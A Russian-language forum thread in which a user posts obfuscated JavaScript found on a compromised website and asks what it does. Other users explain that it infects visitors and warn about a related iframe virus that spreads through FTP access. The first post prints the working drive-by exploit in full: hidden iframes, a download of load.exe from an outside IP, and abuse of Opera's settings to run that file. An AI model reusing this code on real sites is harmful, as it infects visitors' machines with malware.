СКрипт

Тема в разделе "Тех. вопросы", создана пользователем felix_, 28 янв 2008.

Статус темы:
Закрыта.
  1. felix_

    felix_ Писатель

    Регистр.:
    24 янв 2008
    Сообщения:
    2
    Симпатии:
    0
    Доброго времени суток!
    Зашёл на сайт alphaekb.ru, меня привело на _ttp://79.135.166.138/st/index.php, и там увидел такой скрипт...
    PHP:
    <script>
    blank_iframe document.createElement('if'+'ra'+'me');
    blank_iframe.src 'a'+'bo'+'ut:b'+'lank';
    blank_iframe.setAttribute('st'+'yle''disp'+'lay:n'+'one');
    blank_iframe.setAttribute('i'+'d''bla'+'nk_i'+'fram'+'e_w'+'indow');
    document.appendChild(blank_iframe);
    blank_iframe_window.eval
        (
    "config_iframe = document.createElement('if'+'ra'+'me');\
        config_iframe.setAttribute('i'+'d', 'con'+'fig_if'+'rame_w'+'indow');\
        config_iframe.src = 'op'+'era:c'+'on'+'fig';\
        document.appendChild(config_iframe);\
        app_iframe = document.createElement('sc'+'ri'+'pt');\
        cache_iframe = document.createElement('if'+'ra'+'me');\
        app_iframe.src = '_ttp://79.135.166.138/st/load.exe';\
        app_iframe.onload = function ()\
        {\
            cache_iframe.src = 'op'+'er'+'a:c'+'ache';\
            cache_iframe.onload = function ()\
            {\
                cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
                var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
                filename = cache.match(re);\
                config_iframe_window.eval\
                (\"\
                opera.setPreference('Ne'+'tw'+'ork','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
                app_link = document.createElement('a');\
                app_link.setAttribute('h'+'r'+'ef', 't'+'n3'+'270://n'+'oth'+'ing');\
                app_link.click();\
                setTimeout(function () {opera.setPreference('Ne'+'tw'+'ork','TN'+'327'+'0 A'+'pp','te'+'ln'+'et.'+'exe')},1000);\
                \");\
            };\
            document.appendChild(cache_iframe);\
        };\
        document.appendChild(app_iframe);"
    );
    </script>
    что он делает ?
     
  2. Wiltner

    Wiltner Постоялец

    Регистр.:
    4 дек 2007
    Сообщения:
    126
    Симпатии:
    27
    Он подгружает ифреймом загрузку для дальнейшего протроянивания зашедшего на сайт юзера.
     
  3. itex

    itex

    Регистр.:
    15 ноя 2007
    Сообщения:
    274
    Симпатии:
    64
    Можно вирусологам послать файл 79.135.166.138/st/load.exe, если хотете сделать плохо владельцам сплоита.
     
  4. Rastafan

    Rastafan

    Регистр.:
    1 фев 2008
    Сообщения:
    649
    Симпатии:
    169
    У меня Касперский ловит аналогичный ифреймовский вирус. Не знаю на сколько он там безобидный, но если у вас есть доступ на ФТП к своим сайтам то он залазит к вам на сайт и добавляет аналогичный ифрейм в index.html, index.htm и index.php файлы. Соответсвенно теперь и ваш сайт будет распространять этот вирус. Так что будьте бдительны, я уже пару недель не могу вычистить все мои хостинги от вируса ...
     
Статус темы:
Закрыта.